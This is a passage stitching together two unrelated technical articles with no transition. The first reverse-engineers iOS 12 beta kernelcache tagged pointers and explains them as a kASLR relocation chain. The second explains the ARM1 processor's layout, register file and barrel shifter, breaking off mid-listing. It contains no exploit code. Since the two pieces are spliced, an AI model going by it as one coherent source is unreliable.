__TEXT.__os_log               fffffff007448d11 - fffffff007473d6c  [ 172K ]
__TEXT.__fips_hmacs           fffffff007473d6c - fffffff007473d8c  [  32B ]
__TEXT.__thread_starts        fffffff007473d8c - fffffff007473fe4  [ 600B ]
__DATA_CONST.__mod_init_func  fffffff007474000 - fffffff007474220  [ 544B ]
__DATA_CONST.__mod_term_func  fffffff007474220 - fffffff007474438  [ 536B ]
__DATA_CONST.__const          fffffff007474440 - fffffff0076410a0  [ 1.8M ]
__TEXT_EXEC.__text            fffffff007644000 - fffffff0088893f0  [  18M ]
__TEXT_EXEC.initcode          fffffff0088893f0 - fffffff008889a48  [ 1.6K ]
__LAST.__mod_init_func        fffffff00888c000 - fffffff00888c008  [   8B ]
__KLD.__text                  fffffff008890000 - fffffff0088917cc  [ 5.9K ]
__KLD.__cstring               fffffff0088917cc - fffffff008891fa7  [ 2.0K ]
__KLD.__const                 fffffff008891fa8 - fffffff008892010  [ 104B ]
__KLD.__mod_init_func         fffffff008892010 - fffffff008892018  [   8B ]
__KLD.__mod_term_func         fffffff008892018 - fffffff008892020  [   8B ]
__KLD.__bss                   fffffff008892020 - fffffff008892021  [   1B ]
__DATA.__kmod_init            fffffff008894000 - fffffff0088965d0  [ 9.5K ]
__DATA.__kmod_term            fffffff0088965d0 - fffffff008898b28  [ 9.3K ]
__DATA.__data                 fffffff00889c000 - fffffff00890b6e0  [ 446K ]
__DATA.__sysctl_set           fffffff00890b6e0 - fffffff00890db28  [ 9.1K ]
__DATA.__firmware             fffffff00890e000 - fffffff0089867d0  [ 482K ]
__DATA.__common               fffffff008987000 - fffffff0089ed1c8  [ 408K ]
__DATA.__bss                  fffffff0089ee000 - fffffff008a1d6e8  [ 190K ]
__BOOTDATA.__data             fffffff008a20000 - fffffff008a38000  [  96K ]
__PRELINK_INFO.__kmod_info    fffffff008a38000 - fffffff008a38598  [ 1.4K ]
__PRELINK_INFO.__kmod_start   fffffff008a38598 - fffffff008a38b38  [ 1.4K ]
__PRELINK_INFO.__info         fffffff008a38b38 - fffffff008ae9613  [ 707K ]

Of particular consequence to those interested in reversing, the new kernelcaches are missing all symbol information:

% nm kernelcache.iPhone7,1.16A5308e.decompressed | wc -l
       0

So far, Apple hasn’t implemented this new format on all devices. The iPhone 7 (iPhone9,1) kernelcache still has split kexts and the traditional ~4000 symbols.

However, even on devices with the traditional split-kext layout, Apple does appear to be tweaking the format. The layout appears largely the same as before, but loading the kernelcache file into IDA 6.95 generates numerous warnings:

Loading prelinked KEXTs
FFFFFFF005928300: loading com.apple.iokit.IONetworkingFamily
entries start past the end of the indirect symbol table (reserved1 field greater than the table size)
FFFFFFF005929E00: loading com.apple.iokit.IOTimeSyncFamily
entries start past the end of the indirect symbol table (reserved1 field greater than the table size)
FFFFFFF00592D740: loading com.apple.kec.corecrypto
entries start past the end of the indirect symbol table (reserved1 field greater than the table size)
...

Thus, there appear to be at least 3 distinct kernelcache formats:

  • 11-normal: The format used on iOS 10 and 11. It has split kexts, untagged pointers, and about 4000 symbols.
  • 12-normal: The format used on iOS 12 beta for iPhone9,1. It is similar to 11-normal, but with some structural changes that confuse IDA 6.95.
  • 12-merged: The format used on iOS 12 beta for iPhone7,1. It is missing prelink segments, has merged kexts, uses tagged pointers, and, to the dismay of security researchers, is completely stripped.

Unraveling the mystery of the tagged pointers

I first noticed that the pointers in the kernelcache looked weird when I jumped to __DATA_CONST.__mod_init_func in IDA. In the iPhone 7,1 16A5308e kernelcache, this section looks like this:

__DATA_CONST.__mod_init_func:FFFFFFF00748C000 ; Segment type: Pure data
__DATA_CONST.__mod_init_func:FFFFFFF00748C000                 AREA __DATA_CONST.__mod_init_func, DATA, ALIGN=3
__DATA_CONST.__mod_init_func:FFFFFFF00748C000 off_FFFFFFF00748C000 DCQ 0x0017FFF007C95908
__DATA_CONST.__mod_init_func:FFFFFFF00748C000                                         ; DATA XREF: sub_FFFFFFF00794B1F8+438o
__DATA_CONST.__mod_init_func:FFFFFFF00748C000                                         ; sub_FFFFFFF00794B1F8+4CC7w
__DATA_CONST.__mod_init_func:FFFFFFF00748C008                 DCQ 0x0017FFF007C963D0
__DATA_CONST.__mod_init_func:FFFFFFF00748C010                 DCQ 0x0017FFF007C99E14
__DATA_CONST.__mod_init_func:FFFFFFF00748C018                 DCQ 0x0017FFF007C9B7EC
__DATA_CONST.__mod_init_func:FFFFFFF00748C020                 DCQ 0x0017FFF007C9C854
__DATA_CONST.__mod_init_func:FFFFFFF00748C028                 DCQ 0x0017FFF007C9D6B4

This section should be filled with pointers to initialization functions; in fact, the values look almost like pointers, except the first 2 bytes, which should read 0xffff, have been replaced with 0x0017. Aside from that, the next 4 digits of the “pointer” are fff0, as expected, and the pointed-to values are all multiples of 4, as required for function pointers on arm64.

This pattern of function pointers was repeated in the other sections. For example, all of __DATA.__kmod_init and __DATA.__kmod_term have the same strange pointers:

__DATA.__kmod_init:FFFFFFF0088D4000 ; Segment type: Pure data
__DATA.__kmod_init:FFFFFFF0088D4000                 AREA __DATA.__kmod_init, DATA, ALIGN=3
__DATA.__kmod_init:FFFFFFF0088D4000                 DCQ 0x0017FFF007DD3DC0
__DATA.__kmod_init:FFFFFFF0088D4008                 DCQ 0x0017FFF007DD641C
...
__DATA.__kmod_init:FFFFFFF0088D6600                 DCQ 0x0017FFF0088C9E54
__DATA.__kmod_init:FFFFFFF0088D6608                 DCQ 0x0017FFF0088CA1D0
__DATA.__kmod_init:FFFFFFF0088D6610                 DCQ 0x0007FFF0088CA9E4
__DATA.__kmod_init:FFFFFFF0088D6610 ; __DATA.__kmod_init ends
__DATA.__kmod_term:FFFFFFF0088D6618 ; ===========================================================================
__DATA.__kmod_term:FFFFFFF0088D6618 ; Segment type: Pure data
__DATA.__kmod_term:FFFFFFF0088D6618                 AREA __DATA.__kmod_term, DATA, ALIGN=3
__DATA.__kmod_term:FFFFFFF0088D6618                 DCQ 0x0017FFF007DD3E68
__DATA.__kmod_term:FFFFFFF0088D6620                 DCQ 0x0017FFF007DD645C

However, if you look carefully, you’ll see that the last pointer of __kmod_init actually begins with 0x0007 rather than 0x0017. After seeing this, I began to suspect that this was some form of pointer tagging: that is, using the upper bits of the pointer to store additional information. Thinking that this tagging could be due to some new kernel exploit mitigation Apple was about to release, I decided to work out exactly what these tags mean to help understand what the mitigation might be.

My next step was to look for different types of pointers to see if there were any other possible tag values. I first checked the vtable for AppleKeyStoreUserClient. Since there are no symbols, you can find the vtable using the following trick:

  • Search for the “AppleKeyStoreUserClient” string in the Strings window.
  • Look for cross-references to the string from an initializer function. In our case, there’s only one xref, so we can jump straight there.
  • The “AppleKeyStoreUserClient” string is being loaded into register x1 as the first explicit argument in the call to to OSMetaClass::OSMetaClass(char const*, OSMetaClass const*, unsigned int). The implicit this parameter passed in register x0 refers to the global AppleKeySoreUserClient::gMetaClass, of type AppleKeyStoreUserClient::MetaClass, and its vtable is initialized just after the call. Follow the reference just after the call and you’ll be looking at the vtable for AppleKeyStoreUserClient::MetaClass.
  • From there, just look backwards to the first vtable before that one, and that’ll be AppleKeyStoreUserClient’s vtable.

This is what those vtables look like in the new kernelcache:

__DATA_CONST.__const:FFFFFFF0075D7738 ; AppleKeyStoreUserClient vtable
__DATA_CONST.__const:FFFFFFF0075D7738 off_FFFFFFF0075D7738 DCQ 0, 0, 0x17FFF00844BE00, 0x17FFF00844BE04, 0x17FFF007C99514
__DATA_CONST.__const:FFFFFFF0075D7738                                         ; DATA XREF: sub_FFFFFFF00844BE28+287o
__DATA_CONST.__const:FFFFFFF0075D7738                                         ; sub_FFFFFFF00844BE28+2C0o
__DATA_CONST.__const:FFFFFFF0075D7738                 DCQ 0x17FFF007C99528, 0x17FFF007C99530, 0x17FFF007C99540
...
__DATA_CONST.__const:FFFFFFF0075D7738                 DCQ 0x17FFF007D68674, 0x17FFF007D6867C, 0x17FFF007D686B4
__DATA_CONST.__const:FFFFFFF0075D7738                 DCQ 0x17FFF007D686EC, 0x47FFF007D686F4, 0
__DATA_CONST.__const:FFFFFFF0075D7D18 ; AppleKeyStoreUserClient::MetaClass vtable
__DATA_CONST.__const:FFFFFFF0075D7D18 off_FFFFFFF0075D7D18 DCQ 0, 0, 0x17FFF00844BDF8, 0x17FFF0084502D0, 0x17FFF007C9636C
__DATA_CONST.__const:FFFFFFF0075D7D18                                         ; DATA XREF: sub_FFFFFFF0084502D4+887o
__DATA_CONST.__const:FFFFFFF0075D7D18                                         ; sub_FFFFFFF0084502D4+8C0o
__DATA_CONST.__const:FFFFFFF0075D7D18                 DCQ 0x17FFF007C96370, 0x17FFF007C96378, 0x17FFF007C9637C
__DATA_CONST.__const:FFFFFFF0075D7D18                 DCQ 0x17FFF007C96380, 0x17FFF007C963A0, 0x17FFF007C96064
__DATA_CONST.__const:FFFFFFF0075D7D18                 DCQ 0x17FFF007C963AC, 0x17FFF007C963B0, 0x17FFF007C963B4
__DATA_CONST.__const:FFFFFFF0075D7D18                 DCQ 0x57FFF00844BE28, 0, 0

As you can see, most of the pointers still have the 0x0017 tag, but there are also 0x0047 and 0x0057 tags.

You may also notice that the last valid entry in the AppleKeyStoreUserClient::MetaClass vtable is0x0057fff00844be28, which corresponds to the untagged pointer 0xfffffff00844be28, which is the address of the function sub_FFFFFFF00844BE28 that references AppleKeyStoreUserClient’s vtable. This supports the hypothesis that only the upper 2 bytes of each pointer are changed: the metaclass method at index 14 should be AppleKeyStoreUserClient::MetaClass::alloc, which needs to reference the AppleKeyStoreUserClient vtable when allocating a new instance of the class, and so everything fits together as expected.

At this point, I decided to gather more comprehensive information about the tagged pointers. I wrote a quick idapython script to search for 8-byte values that would be valid pointers except that the first 2 bytes were not 0xffff. Here’s the distribution of tagged pointers by section:

Python>print_tagged_pointer_counts_per_section()
__DATA_CONST.__mod_init_func           68
__DATA_CONST.__mod_term_func           67
__DATA_CONST.__const               211000
__TEXT_EXEC.__text                    372
__LAST.__mod_init_func                  1
__KLD.__const                          12
__KLD.__mod_init_func                   1
__KLD.__mod_term_func                   1
__DATA.__kmod_init                   1219
__DATA.__kmod_term                   1205
__DATA.__data                       12649
__DATA.__sysctl_set                  1168
__PRELINK_INFO.__kmod_info            179
__PRELINK_INFO.__kmod_start           180

I also counted how many untagged (i.e. normal) pointers I found in each section:

Python>print_untagged_pointer_counts_per_section()
__TEXT.HEADER                          38

Looking at those untagged pointers in IDA, it was clear that all of them were found in the kernelcache’s Mach-O header. Every other pointer in the entire kernelcache file was tagged.

Next I decided to look at how many copies of each tag were found in each section:

Python>print_tagged_pointer_counts_by_tag_per_section()
__TEXT.HEADER                    ffff (38)
__DATA_CONST.__mod_init_func     0007 (1), 0017 (67)
__DATA_CONST.__mod_term_func     0007 (1), 0017 (66)
__DATA_CONST.__const             0007 (2), 0017 (201446), 0027 (4006), 0037 (1694), 0047 (3056), 0057 (514), 0067 (85), 0077 (26), 0087 (46), 0097 (8), 00a7 (12), 00b7 (13), 00c7 (6), 00d7 (1), 00f7 (4), 0107 (4), 0117 (1), 0137 (1), 0147 (4), 0177 (1), 0187 (3), 0197 (1), 01c7 (3), 01e7 (1), 01f7 (8), 0207 (3), 0227 (32), 02a7 (1), 02e7 (8), 0317 (1), 0337 (1), 0477 (1), 04e7 (2), 0567 (1), 0b27 (1), 15d7 (1), 1697 (1), 21d7 (1)
__TEXT_EXEC.__text               0007 (133), 0017 (11), 00a7 (180), 0107 (3), 0357 (1), 03b7 (1), 03e7 (1), 05e7 (1), 0657 (1), 0837 (1), 0bd7 (1), 0d97 (1), 0e37 (1), 1027 (1), 12a7 (1), 1317 (1), 1387 (1), 1417 (1), 1597 (1), 1687 (1), 18b7 (1), 18d7 (1), 1927 (1), 19c7 (1), 19f7 (1), 1ad7 (1), 1c87 (1), 1ce7 (1), 1da7 (1), 1eb7 (1), 2077 (1), 2777 (1), 2877 (1), 2987 (1), 29b7 (1), 2a27 (1), 2a37 (1), 2aa7 (1), 2ab7 (1), 2bd7 (1), 2cf7 (1), 32b7 (1), 3367 (1), 3407 (1), 3417 (1), 3567 (1), 3617 (1), 37c7 (1), 3cb7 (1)
__LAST.__mod_init_func           0007 (1)
__KLD.__const                    0007 (1), 0017 (11)
__KLD.__mod_init_func            0007 (1)
__KLD.__mod_term_func            0007 (1)
__DATA.__kmod_init               0007 (1), 0017 (1218)
__DATA.__kmod_term               0007 (1), 0017 (1204)
__DATA.__data                    0007 (3), 0017 (7891), 001f (23), 0027 (2326), 002f (6), 0037 (1441), 003f (1), 0047 (74), 0057 (306), 0067 (22), 0077 (77), 007f (3), 0087 (98), 0097 (15), 00a7 (23), 00b7 (13), 00bf (1), 00c7 (13), 00d7 (5), 00e7 (6), 00f7 (15), 0107 (1), 0117 (5), 0127 (7), 0137 (8), 0147 (1), 0167 (4), 0177 (2), 017f (89), 0187 (19), 018f (19), 0197 (6), 019f (5), 01a7 (2), 01af (1), 01b7 (2), 01bf (1), 01c7 (3), 01cf (4), 01d7 (1), 01e7 (1), 0207 (1), 0217 (4), 0247 (2), 025f (1), 0267 (2), 0277 (2), 0297 (1), 02a7 (1), 02b7 (2), 02c7 (1), 02d7 (1), 02e7 (1), 02ff (4), 0307 (14), 030f (2), 0317 (1), 031f (1), 0327 (1), 032f (1), 0337 (2), 0357 (2), 0367 (8), 0377 (1), 03c7 (3), 03cf (1), 03d7 (1), 0417 (1), 0427 (1), 0447 (1), 047f (1), 048f (1), 0497 (1), 04a7 (1), 04c7 (1), 04cf (1), 04d7 (2), 0517 (2), 052f (1), 0547 (1), 05f7 (1), 0607 (1), 060f (1), 0637 (1), 0667 (1), 06b7 (1), 0787 (1), 07cf (1), 08ff (1), 097f (1), 09bf (1), 09f7 (5), 0a87 (1), 0b97 (1), 0ba7 (1), 0cc7 (1), 1017 (1), 117f (1), 1847 (1), 2017 (1), 2047 (1), 2097 (1), 2817 (1), 2c37 (1), 306f (1), 33df (1)
__DATA.__sysctl_set              0007 (1), 0017 (1167)
__PRELINK_INFO.__kmod_info       0007 (1), 0017 (178)
__PRELINK_INFO.__kmod_start      0007 (1), 0017 (179)

While studying the results, it became obvious that the distribution of tags across the 2-byte tag space (0x0000 to 0xffff) was not uniform: most of the tags seemed to use 0x0017, and almost all the tags started with the first digit 0. Additionally, almost all tags ended in 7, and the rest ended in f; no tags ended in any other digit.

I next examined whether there was a pattern to what each tagged pointer referenced, under the theory that the tags might describe the type of referred object. I wrote a script to print the section being referenced by one tagged pointer chosen at random for each tag. Unfortunately, the results didn’t offer any particularly illuminating insights:

Python>print_references_for_tagged_pointers()
0007       149    fffffff007ff5380 __TEXT_EXEC.__text               ->  fffffff007ff53c8 __TEXT_EXEC.__text
0017    213438    fffffff0074c39d0 __DATA_CONST.__const             ->  fffffff00726d80e __TEXT.__cstring
001f        23    fffffff00893c584 __DATA.__data                    ->  fffffff00870956c __TEXT_EXEC.__text
0027      6332    fffffff007639418 __DATA_CONST.__const             ->  fffffff007420e84 __TEXT.__cstring
002f         6    fffffff0089183f4 __DATA.__data                    ->  fffffff0080a11f8 __TEXT_EXEC.__text
0037      3135    fffffff0089010e0 __DATA.__data                    ->  fffffff008a0dff0 __DATA.__common
003f         1    fffffff008937f24 __DATA.__data                    ->  fffffff008520d44 __TEXT_EXEC.__text
0047      3130    fffffff00757b0d0 __DATA_CONST.__const             ->  fffffff008149d68 __TEXT_EXEC.__text
0057       820    fffffff007490b08 __DATA_CONST.__const             ->  fffffff0077470e0 __TEXT_EXEC.__text
0067       107    fffffff00764b980 __DATA_CONST.__const             ->  fffffff00888d8b4 __TEXT_EXEC.__text
...

Finally, while looking at the examples of various tags given by the previous script, I noticed a pattern: 0x0017 seemed to be found in the middle of sequences of pointers, while other tags appeared at the ends of sequences, when the following value was not a pointer. On further inspection, the second-to-last digit seemed to suggest how many (8-byte) words to skip before you’d get to the next tagged pointer: 0x0017 meant the following value was a pointer, 0x0027 meant value after next was a pointer, 0x0037 meant skip 2 values, etc.

After more careful analysis, I discovered that this pattern held for all tags I manually inspected:

  • The tag 0x0007 was usually found at the end of a section.
  • The tag 0x0017 was always directly followed by another pointer.
  • The tag 0x001f was followed by a pointer after 4 intermediate bytes.
  • The tag 0x0027 was followed by a pointer after 8 bytes.
  • The tag 0x0037 was followed by a pointer after 16 bytes.

Extrapolating from these points, I derived the following relation for tagged pointers: For a tagged pointer P at address A, the subsequent pointer will occur at address A + ((P >> 49) & ~0x3).

Even though tags as spans between pointers made little sense as a mitigation, I wrote a script to check whether all the tagged pointers in the kernelcache followed this pattern. Sure enough, all pointers except for those with tag 0x0007 were spot-on. The exceptions for 0x0007 tags occurred when there was a large gap between adjacent pointers. Presumably, if the gap is too large, 0x0007 is used even when the section has not ended to indicate that the gap cannot be represented by the tag.

Pointer tags as a kASLR optimization

So, the pointer tags describe the distance from each pointer to the next in the kernelcache, and there’s a formula that can compute the address of the next pointer given the address and tag of the previous one, kind of like a linked list. We understand the meaning, but not the purpose. Why did Apple implement this pointer tagging feature? Is it a security mitigation or something else?

Even though I initially thought that the tags would turn out to be a mitigation, the meaning of the tags as links between pointers doesn’t seem to support that theory.

In order to be a useful mitigation, you’d want the tag to describe properties of the referred-to value. For example, the tag might describe the length of the memory region referred to by the pointer so that out-of-bound accesses can be detected. Alternatively, the tag might describe the type of object being referred to so that functions can check that they are being passed pointers of the expected type.

Instead, these tags seem to describe properties of the address of the pointer rather than the value referred to by the pointer. That is, the tag indicates the distance to the pointer following this one regardless of to what or to where this pointer actually points. Such a property would be impossible to maintain at runtime: adding a pointer to the middle of a data structure would require searching backwards in memory for the pointer preceding it and updating that pointer’s tag. Thus, if this is a mitigation, it would be of very limited utility.

However, there’s a much more plausible theory. Buried among the other changes, the new kernelcache’s prelink info dictionary has been thinned down by removing the _PrelinkLinkKASLROffsets key. This key used to hold a data blob describing the offsets of all the pointers in the kernelcache that needed to be slid in order to implement kASLR. In the new kernelcache without the kASLR offsets, iBoot needs another way to identify where the pointers in the kernelcache are, and it just so happens that the pointer tags connect each pointer to the next in a linked list.

Thus, I suspect that the pointer tags are the new way for iBoot to find all the pointers in the kernelcache that need to be updated with the kASLR slide, and are not part of a mitigation at all. During boot, the tagged pointers would be replaced by untagged, slid pointers. This new implementation saves space by removing the large list of pointer offsets that used to be stored in the prelink info dictionary.

Conclusion

The new kernelcache format and pointer tagging make analysis using IDA difficult, but now that I have a plausible theory for what’s going on, I plan on extending ida_kernelcache to make working with these new kernelcaches easier. Since the tags are probably not present at runtime, it should be safe to replace all the tagged pointers with their untagged values. This will allow IDA to restore all the cross-references broken by the tags. Unfortunately, the loss of symbol information will definitely make analysis more difficult. Future versions of ida_kernelcache may have to incorporate known symbol lists or parse the XNU source to give meaningful names to labels.

Reverse engineering the ARM1, ancestor of the iPhone’s processor

Almost every smartphone uses a processor based on the ARM1 chip created in 1985. The Visual ARM1 simulator shows what happens inside the ARM1 chip as it runs; the result (below) is fascinating but mysterious.[1] In this article, I reverse engineer key parts of the chip and explain how they work, bridging the gap between the puzzling flashing lines in the simulator and what the chip is actually doing. I describethe overall structure of the chip and then descend to the individual transistors, showing how they are built out of silicon and work together to store and process data. After reading this article, you can look at the chip’s circuits and understand the data they store.

Simulation of the ARM1 processor chip.

Screenshot of the Visual ARM1 simulator, showing the activity inside the ARM1 chip as it executes a program.

Overview of the ARM1 chip

The ARM1 chip is built from functional blocks, each with a different purpose. Registers store data, the ALU (arithmetic-logic unit) performs simple arithmetic, instruction decoders determine how to handle each instruction, and so forth. Compared to most processors, the layout of the chip is simple, with each functional block clearly visible. (In comparison, the layout of chips such as the 6502 or Z-80 is highly hand-optimized to avoid any wasted space. In these chips, the functional blocks are squished together, making it harder to pick out the pieces.)

The diagram below shows the most important functional blocks of the ARM chip.[2] The actual processing happens in the bottom half of the chip, which implements the data path. The chip operates on 32 bits at a time so it is structured as 32 horizontal layers: bit 31 at the top, down to bit 0 at the bottom. Several data buses run horizontally to connect different sections of the chip. The large register file, with 25 registers, stands out in the image. The Program Counter (register 15) is on the left of the register file and register 0 is on the right.[3]

The main components of the ARM1 chip. Most of the pins are used for address and data lines; unlabeled pins are various control signals.

The main components of the ARM1 chip. Most of the pins are used for address and data lines; unlabeled pins are various control signals.

Computation takes place in the ALU (arithmetic-logic unit), which is to the right of the registers. The ALU performs 16 different operations (add, add with carry, subtract, logical AND, logical OR, etc.) It takes two 32-bit inputs and produces a 32-bit output. The ALU is described in detail here.[4] To the right of the ALU is the 32-bit barrel shifter. This large component performs a binary shift or rotate operation on its input, and is described in more detail below. At the left is the address circuitry which provides an address to memory through the address pins. At the right data circuitry reads and writes data values to memory.

Above the datapath circuitry is the control circuitry. The control lines run vertically from the control section to the data path circuits below. These signals select registers, tell the ALU what operation to perform, and so forth. The instruction decode circuitry processes each instruction and generates the necessary control signals. The register decode block processes the register select bits in an instruction and generates the control signals to select the desired registers.[5]

The pins

The squares around the outside of the image above are the pads that connect the processor to the outside world. The photo below shows the 84-pin package for the ARM1 processor chip. The gold-plated pins are wired to the pads on the silicon chip inside the package.

The ARM1 processor chip installed in the Acorn ARM Evaluation System. Original photo by Flibble, https://commons.wikimedia.org/wiki/File:Acorn-ARM-Evaluation-System.jpg, CC BY-SA 3.0.

The ARM1 processor chip installed in the Acorn ARM Evaluation System. Full photo by Flibble, CC BY-SA 3.0.

Most of the pads are used for the address and data lines to memory. The chip has 26 address lines, allowing it to access 64MB of memory, and has 32 data lines, allowing it to read or write 32 bits at a time. The address lines are in the lower left and the data lines are in the lower right. As the simulator runs, you can see the address pins step through memory and the data pins read data from memory. The right hand side of the simulator shows the address and data values in hex, e.g. «A:00000020 D:e1a00271». If you know hex, you can easily match these values to the pin states.

Each corner of the chip has a power pin (+) and a ground pin (-), providing 5 volts to run the chip. Various control signals are at the top of the chip. In the simulator, it is easy to spot the the two clock signals that step the chip through its operations (below). The phase 1 and phase 2 clocks alternate, providing a tick-tock rhythm to the chip. In the simulator, the clock runs at a couple cycles per second, while the real chip has a 8MHz clock, more than a million times faster. Finally, note below the manufacturer’s name «ACORN» on the chip in place of pin 82.

The two clock signals for the ARM1 processor chip.

History of the ARM chip

The ARM1 was designed in 1985 by engineers Sophie Wilson (formerly Roger Wilson) and Steve Furber of Acorn Computers. The chip was originally named the Acorn RISC Machine and intended as a coprocessor for the BBC Micro home/educational computer to improve its performance. Only a few hundred ARM1 processors were fabricated, so you might expect ARM to be a forgotten microprocessor, a historical footnote of the 1980s. However, the original ARM1 chip led to the amazingly successful ARM architecture with more than 50 billion ARM chips produced. What happened?

In the early 1980s, academic research suggested that instead of making processor instruction sets more complex, designers would get better performance from a processor that was simple but fast: the Reduced Instruction Set Computer or RISC.[6] The Berkeley and Stanford research papers on RISC inspired the ARM designers to choose a RISC design. In addition, given the small size of the design team at Acorn, a simple RISC chip was a practical choice.[7]

The simplicity of a RISC design is clear when comparing the ARM1 and Intel’s 80386, which came out the same year: the ARM1 had about 25,000 transistors versus 275,000 in the 386.[8] The photos below show the two chips at the same scale; the ARM1 is 50mm2 compared to 104mm2 for the 386. (Twenty years later, an ARM7TDMI core was 0.1mm2; magnified at the same scale it would be the size of this square  vividly illustrating Moore’s law.)

Die photo of the ARM1 processor chip. Courtesy of Computer History Museum. Intel 386 CPU die photo (A80386DX-20). By Pdesousa359, https://commons.wikimedia.org/wiki/File:Intel_A80386DX-20_CPU_Die_Image.jpg (CC BY-SA 3.0)

Die photos of the ARM1 processor and the Intel 386 processor to the same scale. The ARM1 is much smaller and contained 25,000 transistors compared to 275,000 in the 386. The 386 was higher density, with a 1.5 micron process compared to 3 micron for the ARM1. ARM1 photo courtesy of Computer History Museum. Intel A80386DX-20 by Pdesousa359CC BY-SA 3.0.

Because of the ARM1’s small transistor count, the chip used very little power: about 1/10 Watt, compared to nearly 2 Watts for the 386. The combination of high performance and low power consumption made later versions of ARM chip very popular for embedded systems. Apple chose the ARM processor for its ill-fated Newton handheld system and in 1990, Acorn Computers, Apple, and chip manufacturer VLSI Technology formed the company Advanced RISC Machines to continue ARM development.[9]

In the years since then, ARM has become the world’s most-used instruction set with more than 50 billion ARM processors manufactured. The majority of mobile devices use an ARM processor; for instance, the Apple A8 processor inside iPhone 6 uses the 64-bit ARMv8-A. Despite its humble beginnings, the ARM1 made IEEE Spectrum’s list of 25 microchips that shook the world and PC World’s 11 most influential microprocessors of all time.

Looking at the low-level construction of the ARM1 chip

Getting back to the chip itself, the ARM1 chip is constructed from five layers. If you zoom in on the chip in the simulator, you can see the components of the chip, built from these layers. As seen below, the simulator uses a different color for each layer, and highlights circuits that are turned on. The bottom layer is the silicon that makes up the transistors of the chip. During manufacturing, regions of the silicon are modified (doped) by applying different impurities. Silicon can be doped positive to form a PMOS transistor (blue) or doped negative for an NMOS transistor (red). Undoped silicon is basically an insulator (black).

The ARM1 simulator uses different colors to represent the different layers of the chip.

The ARM1 simulator uses different colors to represent the different layers of the chip.

Polysilicon wires (green) are deposited on top of the silicon. When polysilicon crosses doped silicon, it forms the gate of a transistor (yellow). Finally, two layers of metal (gray) are on top of the polysilicon and provide wiring.[10] Black squares are contacts that form connections between the different layers.

For our purposes, a MOS transistor can be thought of as a switch, controlled by the gate. When it is on (closed), the source and drain silicon regions are connected. When it is off (open), the source and drain are disconnected. The diagram below shows the three-dimensional structure of a MOS transistor.

Structure of a MOS transistor.

Structure of a MOS transistor.

Like most modern processors, the ARM1 was built using CMOS technology, which uses two types of transistors: NMOS and PMOS. NMOS transistors turn on when the gate is high, and pull their output towards ground. PMOS transistors turn on when the gate is low, and pull their output towards +5 volts.

Understanding the register file

The register file is a key component of the ARM1, storing information inside the chip. (As a RISC chip, the ARM1 makes heavy use of its registers.) The register file consists of 25 registers, each holding 32 bits. This section describes step-by-step how the register file is built out of individual transistors.

The diagram below shows two transistors forming an inverter. If the input is high (as below), the NMOS transistor (red) turns on, connecting ground to the output so the output is low. If the input is low, the PMOS transistor (blue) turns on, connecting power to the output so the output is high. Thus, the output is the opposite of the input, making an inverter.

An inverter in the ARM1 chip, as displayed by the simulator.

An inverter in the ARM1 chip, as displayed by the simulator.

Combining two inverters into a loop forms a simple storage circuit. If the first inverter outputs 1, the second inverter outputs 0, causing the first inverter to output 1, and the circuit is stable. Likewise, if the first inverter outputs 0, the second outputs 1, and the circuit is again stable. Thus, the circuit will remain in either state indefinitely, «remembering» one bit until forced into a different state.

Two inverters in the ARM1 chip form one bit of register storage.

Two inverters in the ARM1 chip form one bit of register storage.

To make this circuit into a useful register cell, read and write bus lines are added, along with select lines to connect the cell to the bus lines. When the write select line is activated, the pass connector connects the write bus to the inverter, allowing a new value to be overwrite the current bit. Likewise, pass transistors connect the bit to a read bus when activated by the corresponding select line, allowing the stored value to be read out.

Schematic of one bit in the ARM1 processor's register file.

Schematic of one bit in the ARM1 processor’s register file.

To create the register file, the register cell above is repeated 32 times vertically for each bit, and 25 times horizontally to form each register. Each bit has three horizontal bus lines — the write bus and the two read buses — so there are 32 triples of bus lines. Each register has three vertical control lines — the write select line and two read select lines — so there are 25 triples of control lines. By activating the desired control lines, two registers can be read and one register can be written at a time.[11] When the simulator is running, you can see the vertical control lines activated to select registers, and you can see the data bits flowing on the horizontal bus lines.

By looking at a memory cell in the simulator, you can see which inverter is on and determine if the bit is a 0 or a 1. The diagram below shows a few register bits. If the upper inverter input is active, the bit is 0; if the lower inverter input is active, the bit is 1. (Look at the green lines above or below the bit values.) Thus, you can read register values right out of the simulator if you look closely.

By looking at the ARM1 register file, you can determine the value of each bit. For a 0 bit, the input to the top inverter is active (green/yellow); for a 1 bit, the input to the bottom inverter is active.

By looking at the ARM1 register file, you can determine the value of each bit. For a 0 bit, the input to the top inverter is active (green/yellow); for a 1 bit, the input to the bottom inverter is active.

The barrel shifter

The barrel shifter, which performs binary shifts, is another interesting component of the ARM1. Most instructions use the barrel shifter, allowing a binary argument to be shifted left, shifted right, or rotated by any amount (0 to 31 bits). While running the simulator, you can see diagonal lines jumping back and forth in the barrel shifter.

The diagram below shows the structure of the barrel shifter. Bits flows into the shifter vertically with bit 0 on the left and bit 31 on the right. Output bits leave the shifter horizontally with bit 0 on the bottom and bit 31 on top. The diagonal lines visible in the barrel shifter show where the vertical lines are connected to the horizontal lines, generating a shifted output. Different positions of the diagonals result in different shifts. The upper diagonal line shifts bits to the left, and the lower diagonal line shifts bits to the right. For a rotation, both diagonals are active; it may not be immediately obvious but in a rotation part of the word is shifted left and part is shifted right.

Structure of the barrel shifter in the ARM1 chip.

Structure of the barrel shifter in the ARM1 chip.

Zooming in on the barrel shifter shows exactly how it works. It contains a 32 by 32 crossbar grid of transistors, each connecting one vertical line to one horizontal line. The transistor gates are connected by diagonal control lines; transistors along the active diagonal connect the appropriate vertical and horizontal lines. Thus, by activating the appropriate diagonals, the output lines are connected to the input lines, shifted by the desired amounts. Since the chip’s input lines all run horizontally, there are 32 connections between input lines and the corresponding vertical bit lines.

Details of the barrel shifter in the ARM1 chip. Transistors along a specific diagonal are activated to connect the vertical bit lines and output lines. Each input line is connected to a vertical bit line through the indicated connections.

Details of the barrel shifter in the ARM1 chip. Transistors along a specific diagonal are activated to connect the vertical bit lines and output lines. Each input line is connected to a vertical bit line through the indicated connections.

The demonstration program

When you run the simulator, it executes a short hardcoded program that performs shifts of increasing amounts. You don’t need to understand the code, but if you’re curious it is:

0000  E1A0100F mov     r1, pc        @ Some setup
0004  E3A0200C mov     r2, #12
0008  E1B0F002 movs    pc, r2
000C  E1A00000 nop
0010  E1A00000 nop
0014  E3A02001 mov     r2, #1        @ Load register r2 with 1
0018  E3A0100F mov     r1, #15       @ Load r1 with value to shift
001C  E59F300C ldr     r3, pointer
    loop:
0020  E1A00271 ror     r0, r1, r2    @ Rotate r1 by r2 bits, store in r0
